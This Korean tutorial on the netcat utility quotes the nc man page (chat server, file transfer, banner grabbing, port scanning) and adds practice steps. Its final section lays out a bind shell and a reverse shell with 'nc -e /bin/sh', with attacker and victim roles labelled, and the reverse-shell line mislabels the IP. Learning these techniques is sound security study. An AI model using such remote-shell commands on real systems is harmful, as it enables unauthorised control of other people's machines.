nc는 telnet을 대신 할 수 있다.
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NAME nc - arbitrary TCP and UDP connections and listens SYNOPSIS nc [-46DdhklnrStUuvz] [-i interval] [-p source_port] [-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_protocol] [-x proxy_address[:port]] [hostname] [port[s]] DESCRIPTION The nc (or netcat) utility is used for just about anything under the sun involving TCP or UDP. CLIENT/SERVER MODEL It is quite simple to build a very basic client/server model using nc. On one con- sole, start nc listening on a specific port for a connection. For example: (nc server)$ nc -l 1234 nc is now listening on port 1234 for a connection. On a second console (or a second machine), connect to the machine and port being listened on: (nc client)$ nc 1234 There should now be a connection between the ports. Anything typed at the second console will be concatenated to the first, and vice-versa. After the connection has been set up, nc does not really care which side is being used as a ‘server’ and which side is being used as a ‘client’. The connection may be terminated using an EOF (‘^D’). DATA TRANSFER The example in the previous section can be expanded to build a basic data transfer model. Any information input into one end of the connection will be output to the other end, and input and output can be easily captured in order to emulate file transfer. Start by using nc to listen on a specific port, with output captured into a file: $ nc -l 1234 > filename.out Using a second machine, connect to the listening nc process, feeding it the file which is to be transferred: $ nc 1234 < After the file has been transferred, the connection will close automatically. TALKING TO SERVERS It is sometimes useful to talk to servers “by hand” rather than through a user inter- face. It can aid in troubleshooting, when it might be necessary to verify what data a server is sending in response to commands issued by the client. For example, to retrieve the home page of a web site: $ echo -n "GET / HTTP/1.0\r\n\r\n" | nc 80 Note that this also displays the headers sent by the web server. They can be fil- tered, using a tool such as sed(1), if necessary. More complicated examples can be built up when the user knows the format of requests required by the server. As another example, an email may be submitted to an SMTP server using: $ nc localhost 25 << EOF HELO MAIL FROM: <> RCPT TO: <> DATA Body of email. . QUIT EOF
PORT SCANNING It may be useful to know which ports are open and running services on a target machine. The -z flag can be used to tell nc to report open ports, rather than initi- ate a connection. For example: $ nc -z 20-30 Connection to 22 port [tcp/ssh] succeeded! Connection to 25 port [tcp/smtp] succeeded! The port range was specified to limit the search to ports 20 - 30. Alternatively, it might be useful to know which server software is running, and which versions. This information is often contained within the greeting banners. In order to retrieve these, it is necessary to first make a connection, and then break the connection when the banner has been retrieved. This can be accomplished by specify- ing a small timeout with the -w flag, or perhaps by issuing a "QUIT" command to the server: $ echo "QUIT" | nc 20-30 SSH-1.99-OpenSSH_3.6.1p2 Protocol mismatch. 220 IMS SMTP Receiver Version 0.84 Ready |
1. nc(netcat)은 TCP나 UDP프로토콜을 사용하는 네트워크 연결에서 데이터를 읽고 쓰는 간단한 유틸리티 프로그램.
2. 일반적으로는 UNIX의 cat과 비슷한 사용법을 가지고 있지만 cat이 파일에 쓰거나 읽듯, nc는 network connection에 읽거나 쓴다.
3. 이것은 스크립트와 병용하여 network에 대한 debugging, testing tool로 서 매우 편리하지만 반면 해킹에도 이용범위가 넓다.
4. nc는 network connection에서 raw-data read, write 할 수 있는 유틸리티 프로그램.
5. nc는 거의 모든 종류의 접속 형태를 만들어 낼 수 있기 때문에 다기능의 네트워크 문제해결/조사시 유용하게 사용가능하다.
■ 프로그램 다운로드
(Linux nc)
(Window nc)
기본적으로 repository 서버에는 들어있지만 일반 서버에는 설치가 안되어있다.
반드시 최신 버전을 다운받아서 사용해야한다.
[실습] 간단한 네트워크 연결
# nc 22 (# telnet localhost 22)
[실습] 간단한 서버/클라이언트 구성
포트 7979에서 listen하는 간단한 채팅 서버
(nc server)
[TERM 1] # nc -l 7979
(nc client)
[TERM 2] # nc 7979 ( # telnet 7979)
> 클라이언트에서 입력한 모든 문자가 서버에 출력된다.
> 클라이언트에서 <CTRL + D> 통해 끊을 때 서버도 같이 종료.
> connection이 이루어 졌을 때 파일을 실행. -l 과 같이 사용되면 한 instance 만을 사용하는 inetd와 비슷
[실습] 파일전송
(nc server) [TERM 1] # nc -l 7979 > /tmp/output.txt
(nc client) [TERM 2] # ps auxf | nc 7979 or # nc < /tmp/input.txt
(nc server) [TERM 1] # cat /tmp/output.txt
[참고] 참고 사이트(반드시 참고)
> 백도어 쉘과 리버스 쉘 부분 반드시 참고.
nc가 반드시 최신버전으로 설치되어야 한다. 필요하다면 칼리리눅스에서 써도 무방.
꼭 기억해놔야할 부분.
■ 백도어 쉘(bind_tcp)
서버(공인 IP) - Victim |
클라이언트(공인 IP/ 사설 IP) - Attacker |
# nc -e /bin/sh -l -p 1234 -p = 포트번호(최신버전은 붙여줘야한다.) |
# nc <Victim's IP> 1234 uname -a; ls -al; |
■ 리버스 쉘(reverse_tcp)
서버(공인 IP) - Attacker |
클라이언트(공인 IP/ 사설 IP) - Victim |
# nc -n -v -l -p 1234 // -v는 안 써도된다. ifconfig; id; hostname; |
# nc -e /bin/sh <Victim's IP> 1234 |
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